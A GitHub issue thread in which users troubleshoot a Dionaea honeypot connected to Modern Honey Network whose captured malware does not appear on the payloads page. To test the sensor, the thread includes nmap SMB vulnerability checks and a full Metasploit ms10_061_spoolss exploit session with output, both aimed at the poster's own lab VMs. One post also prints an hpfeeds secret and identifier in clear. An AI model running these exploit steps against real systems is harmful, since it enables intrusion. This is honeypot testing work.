Dionaea in MHN Shows No Payloads

[royikle]

Hi all

I'm testing the dionaea sensor. MHN is a very nice tools ,It's easy to install dionaea. I use nmap to scan my dionaea , I can get event in MHN Attacks page.

But here is a question , The payloads page with dionaea.capture are not displayed log. Review the past issue , I think the point is nothing in /var/dionaea/binaries/. How can I create something in binaries folder?

[royikle]

For now I tried two method but there is nothing in /var/dionaea/binaries/.

1. Install curl and close UFW. https://github.com/threatstream/mhn/issues/414

2. nmap --script smb-vuln-ms08-067.nse -p445 {ip} https://github.com/threatstream/mhn/issues/372

   
   Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-05 16:41 CST
   NSE: failed to initialize the script engine:
   /usr/bin/../share/nmap/nse_main.lua:779: 'smb-vuln-ms08-067.nse' did not match a category, filename, or directory
   stack traceback:
   [C]: in function 'error'
   /usr/bin/../share/nmap/nse_main.lua:779: in function 'get_chosen_scripts'
   /usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
   [C]: in ?

QUITTING!

Is there any way I can fix this?

[royikle]

Use nmap to check the 445 port ,it open.

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)

Firewall is down.

ubuntu@ubuntu:~$ sudo ufw status
[sudo] password for ubuntu: 
Status: inactive

[royikle]

They are my virtual machine by using NAT. I want to solve every problem as passable as I can before I put it on-line. So we talk about location . Is that mean some attack just have log but will not catch binaries (like:nmap -sV -P0 IP)? Maybe I need to use other method to check binaries?

[Waseem-farooqui]

Try this and check whether your honeypot is really vulnerable for the smb vulnerability for ms08-067. nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}

[arnydo]

    I have had the same issue when deployed via the script in MHN. I manually installed Dionaea and then linked it to MHN for monitoring. Started catching binaries right away. 

On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" notifications@github.com wrote:

Try this and check whether your honeypot is really vulnerable for the smb vulnerability for ms08-067. nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread.

[SmUrF3R5]

How did you deploy manually and link to mhn?

On Tue, Jun 6, 2017 at 4:18 AM arnydo notifications@github.com wrote:

I have had the same issue when deployed via the script in MHN. I manually installed Dionaea and then linked it to MHN for monitoring. Started catching binaries right away.

On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" < notifications@github.com> wrote:

Try this and check whether your honeypot is really vulnerable for the smb vulnerability for ms08-067. nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread.

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/threatstream/mhn/issues/417#issuecomment-306443614, or mute the thread https://github.com/notifications/unsubscribe-auth/AYt19tgh75gARR6VekgboZAPOOYF2PDNks5sBSdzgaJpZM4NvwhU .

-- -SmUrF3R5

[arnydo]

    I followed the install instructions from:HTTPS://github.com/dinotools/dionaea

And linked it via Hpfeeds as described at:https://github.com/threatstream/mhn/wiki/Incorporate-an-already-deployed-Honeypot-into-MHN

    Hope this helps!

On Tue, Jun 6, 2017 at 10:59 AM -0400, "SmUrF3R5" notifications@github.com wrote:

How did you deploy manually and link to mhn?

On Tue, Jun 6, 2017 at 4:18 AM arnydo notifications@github.com wrote:

I have had the same issue when deployed via the script in MHN. I manually

installed Dionaea and then linked it to MHN for monitoring. Started

catching binaries right away.

On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" <

notifications@github.com> wrote:

Try this and check whether your honeypot is really vulnerable for the smb

vulnerability for ms08-067. nmap -A

/usr/share/nmap/scripts/smb-check-vulns.nse {host}

—

You are receiving this because you are subscribed to this thread.

Reply to this email directly, view it on GitHub, or mute the thread.

—

You are receiving this because you are subscribed to this thread.

Reply to this email directly, view it on GitHub

https://github.com/threatstream/mhn/issues/417#issuecomment-306443614,

or mute the thread

https://github.com/notifications/unsubscribe-auth/AYt19tgh75gARR6VekgboZAPOOYF2PDNks5sBSdzgaJpZM4NvwhU

.

--

-SmUrF3R5

— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or mute the thread.

[SmUrF3R5]

Thanks for that. I am unclear as to what to put here. PUBLISH_CHANNELS=

On Tue, Jun 6, 2017 at 9:02 AM, arnydo notifications@github.com wrote:

I followed the install instructions from:HTTPS://github.com/ dinotools/dionaea And linked it via Hpfeeds as described at:https://github.com/ threatstream/mhn/wiki/Incorporate-an-already-deployed-Honeypot-into-MHN

Hope this helps!

On Tue, Jun 6, 2017 at 10:59 AM -0400, "SmUrF3R5" < notifications@github.com> wrote:

How did you deploy manually and link to mhn?

On Tue, Jun 6, 2017 at 4:18 AM arnydo notifications@github.com wrote:

I have had the same issue when deployed via the script in MHN. I manually

installed Dionaea and then linked it to MHN for monitoring. Started

catching binaries right away.

On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" <

notifications@github.com> wrote:

Try this and check whether your honeypot is really vulnerable for the smb

vulnerability for ms08-067. nmap -A

/usr/share/nmap/scripts/smb-check-vulns.nse {host}

—

You are receiving this because you are subscribed to this thread.

Reply to this email directly, view it on GitHub, or mute the thread.

—

You are receiving this because you are subscribed to this thread.

Reply to this email directly, view it on GitHub

https://github.com/threatstream/mhn/issues/417#issuecomment-306443614,

or mute the thread

https://github.com/notifications/unsubscribe-auth/ AYt19tgh75gARR6VekgboZAPOOYF2PDNks5sBSdzgaJpZM4NvwhU

.

--

-SmUrF3R5

— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or mute the thread.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/threatstream/mhn/issues/417#issuecomment-306514623, or mute the thread https://github.com/notifications/unsubscribe-auth/AYt19hc0uYuhFBuuiKrAe44nOiOy2RVHks5sBWofgaJpZM4NvwhU .

[royikle]

1.Try nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}

  ubuntu@ubuntu:~$ nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse 10.20.1.81
  Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:35 CST
  Unable to split netmask from target expression: "/usr/share/nmap/scripts/smb-check-vulns.nse"

  ubuntu@ubuntu:/usr/share/nmap/scripts$ nmap -A 10.20.1.81
  Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:42 CST
  Nmap scan report for 10.20.1.81
  Host is up (0.0012s latency).
  Not shown: 991 closed ports
  PORT     STATE SERVICE      VERSION
  21/tcp   open  ftp          Dionaea honeypot ftpd
  .
  .
  .
  Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 287.36 seconds

No payloads in MHN and no file in/var/dionaea/binaries/.

2.I deploied dionaea by MHN deploy script. I don't know how to link to mhn , so I just use script to install. It will link to mhn automatically I think. Isn't it?

3.About link to hpfeed. My problem is bigger than @SmUrF3R5 . I just know IDENT is UUID from MHN. I have no ideal where can found SECRET and PUBLISH_CHANNELS. Is SECERT in dionaea.conf ?

[Waseem-farooqui]

Check the installation directory of the nmap and findout the scripts that are related to smb vulnerabilities. Dionaea get the payload on 445 the nmap scanner will only for the testing of your setup to upload the malware sample you have to used tools like metasploit.

2. Yes mhn script automatically connects the honeypot to the mhn server.
3. Yes the secret is in dionaea's configuration and also in mongodb at server, publish channels are also in mongodb.

[royikle]

I check the path of /usr/share/nmap/scripts . And found out a smb-check-vulns.nse file. So the file is here but command can't run. Do I have any command to do the same thing? I tried this command. ubuntu@ubuntu:~$ nmap -A --script=smb-check-vulns.nse 10.20.1.81 The /var/dionaea/binaries/ still empty. My command seems work. Is smb-check-vulns.nse not a metasploit? I'm not good at metasploit . I can open armitage tool in Kali but not really understand every attack means. Can someone recommend a keyword for metasploit that I can google it by myself ?

Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 15:15 CST
Nmap scan report for 10.20.1.81
Host is up (0.011s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)
.
.
.
Host script results:
| smb-check-vulns: 
|   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.94 seconds

[Waseem-farooqui]

Add this argument in your --script-args=unsafe=1 nmap command like this, nmap -A --script=smb-check-vulns.nse 1--script-args=unsafe=1 0.20.1.81` because as per the nmap output your system looks clean that's mean your configurations are not valid. try the command and share the output.

[royikle]

OK , I try the command. nmap -A --script=smb-check-vulns.nse --script-args=unsafe=1 10.20.1.81 The /var/dionaea/binaries/ is empty. Here is output. It seems I can try MS08-067 threat?

Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 16:56 CST
Nmap scan report for 10.20.1.81
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=6.40%I=7%D=6/7%Time=5937BFB4%P=x86_64-pc-linux-gnu%r(NULL,
SF:2B,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\.8\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5060-TCP:V=6.40%I=7%D=6/7%Time=5937BFC1%P=x86_64-pc-linux-gnu%r(SIP
SF:Options,10A,"SIP/2\.0\x20200\x20OK\r\nContact:\x20sip:nm2@nm2\r\nTo:\x2
SF:0sip:nm2@nm2\r\nCSeq:\x2042\x20OPTIONS\r\nAccept-Language:\x20en\r\nAcc
SF:ept:\x20application/sdp\r\nCall-ID:\x2050000\r\nVia:\x20SIP/2\.0/TCP\x2
SF:0nm;branch=foo\r\nContent-Length:\x200\r\nAllow:\x20REGISTER,\x20OPTION
SF:S,\x20INVITE,\x20CANCEL,\x20BYE,\x20ACK\r\nFrom:\x20sip:nm@nm;tag=root\
SF:r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5061-TCP:V=6.40%T=SSL%I=7%D=6/7%Time=5937BFCE%P=x86_64-pc-linux-gnu
SF:%r(SIPOptions,10A,"SIP/2\.0\x20200\x20OK\r\nContact:\x20sip:nm2@nm2\r\n
SF:To:\x20sip:nm2@nm2\r\nCSeq:\x2042\x20OPTIONS\r\nAccept-Language:\x20en\
SF:r\nAccept:\x20application/sdp\r\nCall-ID:\x2050000\r\nVia:\x20SIP/2\.0/
SF:TCP\x20nm;branch=foo\r\nContent-Length:\x200\r\nAllow:\x20REGISTER,\x20
SF:OPTIONS,\x20INVITE,\x20CANCEL,\x20BYE,\x20ACK\r\nFrom:\x20sip:nm@nm;tag
SF:=root\r\n\r\n");

Host script results:
| smb-check-vulns: 
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NOT VULNERABLE

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 340.23 seconds

[Waseem-farooqui]

Your configurations look fine as ms08-067 is vulnerable so use metasploit to upload the exploit on your dionaea using the following.

https://docs.google.com/document/d/1Lg5q-NL38mjbwYHYP4cGrGZ5baY4etB0-BdWPie2xVw/edit?usp=sharing

[royikle]

ubuntu@ubuntu:~$ msfconsole
msfconsole: command not found

So I need to install Metasploit Framework first right? I will try it tomorrow!

[royikle]

Sorry for yesterday , I just had something important. First use the script from google docs.

msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.144
LHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options

Module options (exploit/windows/smb/ms10_061_spoolss):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PNAME    XPSPrinter       no        The printer share name to use on the target
   RHOST    192.168.216.144  yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  spoolss          no        The named pipe for the spooler service

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse TCP handler on 192.168.216.144:4444 
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[-] 192.168.216.144:445 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.

Maybe it's not a good ideal to scan Dionaea by itself. I will create a new vm and try again.

[royikle]

I just use the other vm to try this.

msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.139
LHOST => 192.168.216.139
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options

Module options (exploit/windows/smb/ms10_061_spoolss):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PNAME    XPSPrinter       no        The printer share name to use on the target
   RHOST    192.168.216.144  yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  spoolss          no        The named pipe for the spooler service

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse TCP handler on 192.168.216.139:4444 
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Attempting to exploit MS10-061 via \\192.168.216.144\XPSPrinter ...
[*] 192.168.216.144:445 - Printer handle: 0000000000000000000000000000000000000000
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 73802 bytes to %SystemRoot%\system32\eb1czUt1c1YZ0v.exe
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 2233 bytes to %SystemRoot%\system32\wbem\mof\mu4JkthYhxiKjN.mof
[-] 192.168.216.144:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.

msf exploit(ms10_061_spoolss) > sqlite3 /var/dionaea/logsql.sqlite
[-] Unknown command: sqlite3.
msf exploit(ms10_061_spoolss) > select * from download;
[-] Unknown command: select.
msf exploit(ms10_061_spoolss) >  ls -l /var/dionaea/binaries/  
[*] exec:  ls -l /var/dionaea/binaries/  

ls: cannot access /var/dionaea/binaries/: No such file or directory

There are two files in /var/dionaea/binaries/ . 415454e80e4ebc341928b6f5b89d251d、spoolss-2hhwq5zi.tmp

And dionaea payloads in MHN is still empty. I install this dionaea by using MHN deploy script. Is that means I have problem in dionaea connecting to MHN?

[Waseem-farooqui]

You have to run the sqlite3 commands on sensor not on metasploit, as well as the sql query on the sqlite3 console. You have to check your hpfeeds section of the dionaea configuration is it proper ?

[royikle]

ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from download;
Error: no such table: download

ubuntu@ubuntu:~$ ls -l /var/dionaea/binaries/ 
total 152
-rw------- 2 nobody nogroup 73802 Jun  8 15:14 415454e80e4ebc341928b6f5b89d251d
-rw------- 2 nobody nogroup 73802 Jun  8 15:14 spoolss-2hhwq5zi.tmp

I use script in MHN , find out dionaea's configuration.

mongo hpfeeds
> db.auth_key.find()

{ "_id" : ObjectId("59350aad1d41c805e59d6091"), "subscribe" : [ ], "secret" : "Qa8EsgaruZZezlVZ", "identifier" : "1919e7aa-49c2-11e7-b60b-000c2940d5f9", "publish" : [ "mwbinary.dionaea.sensorunique", "dionaea.capture", "dionaea.capture.anon", "dionaea.caputres", "dionaea.connections" ] }

And check dionaea.conf file in dionaea sensor /etc/dionaea.

        hpfeeds = {
            hp1 = {
                server = "10.20.1.xx"
                port = "10000"
                ident = "1919e7aa-49c2-11e7-b60b-000c2940d5f9"
                secret = "Qa8EsgaruZZezlVZ"
                // dynip_resolve: enable to lookup the sensor ip through a webservice
                dynip_resolve = "http://queryip.net/ip/"
            }
        }

The server is my MHN ip and ident , secret looks OK. I check the port status. MHN

PORT      STATE SERVICE           VERSION
80/tcp    open  http              nginx 1.4.6 (Ubuntu)
3000/tcp  open  http-proxy        sslstrip
8181/tcp  open  tcpwrapped
10000/tcp open  snet-sensor-mgmt?

Dionaea

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)

Is port 10000 also need to open in dionaea?

[Waseem-farooqui]

Use the query select * from downloads. Also test your mhn machine all the services are running ? sudo supervisorctl status, sudo supervisorctl restart all . No its the server port client port could be any.

[royikle]

OK , mhn-celery-worker is really FATAL. I try to start it now by MHN Troubleshooting Guide. So I need to do action in google doc again , right?

ubuntu@ubuntu:/var/log/mhn$ sudo supervisorctl status
geoloc                           RUNNING    pid 2882, uptime 0:07:53
honeymap                         RUNNING    pid 2898, uptime 0:07:51
hpfeeds-broker                   RUNNING    pid 2867, uptime 0:07:53
mhn-celery-beat                  RUNNING    pid 2866, uptime 0:07:53
mhn-celery-worker                RUNNING    pid 2984, uptime 0:00:16
mhn-collector                    RUNNING    pid 2897, uptime 0:07:51
mhn-uwsgi                        RUNNING    pid 2887, uptime 0:07:52
mnemosyne                        RUNNING    pid 2875, uptime 0:07:53

And very sorry , I don't really know how to query select * from downloads. Is the script like this?

sqlite> query select * from downloads.
   ...> ls -l /var/dionaea/binaries/ 
   ...> 

[Waseem-farooqui]

why do you want dionaea what is your purpose ? And don't write query before select and put ; at the end.

[Waseem-farooqui]

mhn-celery-worker was fatal before restart ?

[royikle]

Yes , mhn-celery-worker was fatal before restart.

I will put dionaea online before that I need to know what will happen as possible as I can. And I need answer other co-workers every question about MHN , even it's just a part of sensor. For this case , I want to know how dionaea payloads work and what information will output.

[Waseem-farooqui]

You have payload on the mhn dashboard now ? ok.

[royikle]

No there is nothing on payloads page. It's really odd. I will try to reinstall MHN and dionaea. Maybe it's some many change for them and something had bad effect. I had a time stamp problem before and the final solution is MHN had something broken. Reinstall MHN and do the same thing . The problem fix. #405 So I hope this time is the same situation.

[royikle]

After reinstall:

1. MHN port 10000 is open
2. Supervisorctl status are all RUNNING
3. Check hpfeed information in both mhn and dionaea are the same.
4. Run msfconsole.
5. Run sqlite3 , It's seems I don't a table named download.

   ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
   SQLite version 3.8.2 2013-12-06 14:53:30
   Enter ".help" for instructions
   Enter SQL statements terminated with a ";"
   sqlite> select * from download;
   Error: no such table: download

6. Two files in /var/dionaea/binaries .
7. Attack page have log but dionaea.capture in payloads get nothing.

I have no idea about it . Can someone let me know what the information looks like in dionaea.capture page? I can't create it by myself , so I want to know what will be there at least. Or someone still have solution to teach me?

[Waseem-farooqui]

First of all the table is downloads not download, Try to upload the malware samples again from metasploit every service should be running. The download page of mhn just show the hashes.

[royikle]

1. Check service

   ubuntu@ubuntu:~$ sudo supervisorctl status
   [sudo] password for ubuntu: 
   geoloc                           RUNNING    pid 1494, uptime 3:22:18
   honeymap                         RUNNING    pid 1506, uptime 3:22:18
   hpfeeds-broker                   RUNNING    pid 1492, uptime 3:22:18
   mhn-celery-beat                  RUNNING    pid 1491, uptime 3:22:18
   mhn-celery-worker                RUNNING    pid 1498, uptime 3:22:18
   mhn-collector                    RUNNING    pid 1499, uptime 3:22:18
   mhn-uwsgi                        RUNNING    pid 1495, uptime 3:22:18
   mnemosyne                        RUNNING    pid 1493, uptime 3:22:18

2. Upload the malware samples again from metasploit.

   
   msf exploit(ms10_061_spoolss) > exploit

[] Started reverse TCP handler on 192.168.216.139:4444 [] 10.20.1.xx:445 - Trying target Windows Universal... [] 10.20.1.xx:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ... [] 10.20.1.xx:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ... [] 10.20.1.xx:445 - Attempting to exploit MS10-061 via \10.20.1.xx\XPSPrinter ... [] 10.20.1.xx:445 - Printer handle: 0000000000000000000000000000000000000000 [] 10.20.1.xx:445 - Job started: 0x3 [] 10.20.1.xx:445 - Wrote 73802 bytes to %SystemRoot%\system32\25sOBX2ew81reE.exe [] 10.20.1.xx:445 - Job started: 0x3 [] 10.20.1.xx:445 - Wrote 2241 bytes to %SystemRoot%\system32\wbem\mof\Pd0IItuyiKmnp6.mof [-] 10.20.1.xx:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass [*] Exploit completed, but no session was created.

3. File in /var/dionaea/binaries/

4. Use the SQLite . 
    The script in here always confuse me .
    I think my script here may be incorrect again?
    I just show them but so nothing.

ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite SQLite version 3.8.2 2013-12-06 14:53:30 Enter ".help" for instructions Enter SQL statements terminated with a ";" sqlite> select * from downloads; 1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58 2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4 sqlite> ls -l /var/dionaea/binaries/ ...>

5. Attack page have log but dionaea.capture in payloads get nothing.

[Waseem-farooqui]

Brother in sqlite you have to just run the sql queries and ls -l /var/dionaea/binaries/ is the command of the linux.

[royikle]

Sorry bro , I'm really not good at sql. Can you teach me how to do sql queries? I just got here and I don't know what's next.

ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from downloads;
1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58
2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4

[royikle]

I had send the mail. Really thanks for your help.

[JBAnderson]

Did you ever get the uploads showing on the payloads page? How did you resolve the issue? I have a Dionaea instance that is catching malware, my hpfeed is sending data to MHN, but there is nothing showing up in payloads. Thanks!

[royikle]

I could see file in /var/dionaea/binaries/ and connection between mhn , dionaea is no problem, All service is running. But after I upload metasploit, the payloads shows nothing. Is your situation like me?

[JBAnderson]

I did actually get it working. I updated curl to ver 7.50 and installed MHN as root. Everything is working great now

[JBAnderson]

I wrote up what I did in a blog post found here: https://www.attacusatlas.com/how-to-set-up-dionaea-honeypot-with-modern-honey-network-and-slack-alerts/

Hope it helps!

[royikle]

Thanks!! I will check the blog and try again.

You install MHN use sudo as root, this is what I do. So maybe the different is curl version , I will check it.

[izotope115]

I just wanted to say that the article @JBAnderson wrote is excellent. I already had an MHN install working, along with one sensor that was reporting attacks. All with Splunk integration too. But wasn't capturing malware binaries like most users.

After reading @JBAnderson 's article I now have a sensor running and capturing malware. It took about 30 mins before I captured the wanna_cry ransomeware. Kudos @JBAnderson for the hard work!

[royikle]

So everyone can use the mhn payloads to show malware information now , except me. I also follow @JBAnderson blog part 1,2 and use ms10_061_spoolss to test. It's nothing change. I can get attack log in my mhn but payload still nothing. Binaries folder have spoolss file and all service is up.

Should I try to install splunk or elk ? Is it related to mhn payloads page?

[JBAnderson]

@royikle ELK and splunk are unrelated to your issue.

The most likely place to look I think is where you set up the HPFeeds user. The publish channels need to be exactly:

"dionaea.connections,dionaea.capture,mwbinary.dionaea.sensorunique,dionaea.caputres,dionaea.capture.anon"

(even though it looks like there's a typo in one of them)

It sounds like you are getting the "dionaea.connections" messages but not the others.

Lemme know!

[royikle]

Thanks for your answer @JBAnderson . I check my mhn hpfeeds . It seems good. Is the virtual box network set in bridge affect it? > db.auth_key.find({identifier: "7c5709e2-769f-11e7-a4de-08002786e5ea"}) { "_id" : ObjectId("59804ff531eddd0543c86aa5"), "subscribe" : [ ], "secret" : "FFffF*************", "identifier" : "7c5709e2-769f-11e7-a4de-***********", "publish" : [ "dionaea.connections", "dionaea.capture", "mwbinary.dionaea.sensorunique", "dionaea.caputres", "dionaea.capture.anon" ] }

[suwitcham]

I have MHN with Dionaea run for a week before start to see payload capture. Not sure if nmap script or metasploit really send malicious file to 445 (SMB). If they just exploit and send payload to memory, I don't think Dionaea can capture it.

[royikle]

Nmap is no payloads, it just scan dionaea. But use ms10_061_spoolss to exploit dionaea, we can check payload file in Binaries folder. If they just send payload to memory , the file will disappear after restart vm. So I think spoolss should be capture but problem is why can I show message in MHN.

[suwitcham]

@JBAnderson, Great advice on Dionaea setup. I add another sensor from your instruction and not I got Wannacry sample :D

[royikle]

@suwitcham, Is the sample show on MHN payloads page? Or show in Dionaea Binaries folder? If you can show on MHN , I am the only one can't show on payloads.

[suwitcham]

It show on both MHN payload for dionaea and under binary folder of dionaea itself.

[royikle]

Everybody follow @JBAnderson 's article and only me can't show. It's seems MHN & dionaea setting is good. Is that means maybe the problem is VM setting ,Firewall ? But it just send a log to MHN is that possible to be block?

[suwitcham]

Let take into two separate issue. Dionaea itself also work as standalone. If you can see anything on Dionaea log, it should be something wrong by itself.

[royikle]

I can see malicious file(spoolss) in Binaries folder. And I can see attck log in dionaea. So I think dioneae is work.

[JBAnderson]

@royikle try the following from the troubleshooting wiki:

out of the box, mnemosyne filters out attacks coming from rfc1918 addresses so, you need to configure it not to do so. Here are the steps:

As root, run these commands.

cd /opt/mnemosyne/ git fetch origin git stash git merge origin/master git stash pop Now, edit mnemosyne.cfg and append this to the end of the file.

[normalizer] ignore_rfc1918 = False Lastly, run this command:

supervisorctl restart mnemosyne Then run.

supervisorctl status You should see something like this:

geoloc RUNNING pid 16719, uptime 1:25:31 honeymap RUNNING pid 17223, uptime 0:30:29 hpfeeds-broker RUNNING pid 980, uptime 10 days, 5:19:51 mhn-celery-beat RUNNING pid 961, uptime 10 days, 5:19:51 mhn-celery-worker RUNNING pid 14878, uptime 3:44:43 mhn-uwsgi RUNNING pid 9580, uptime 9 days, 3:46:32 mnemosyne RUNNING pid 17749, uptime 0:05:26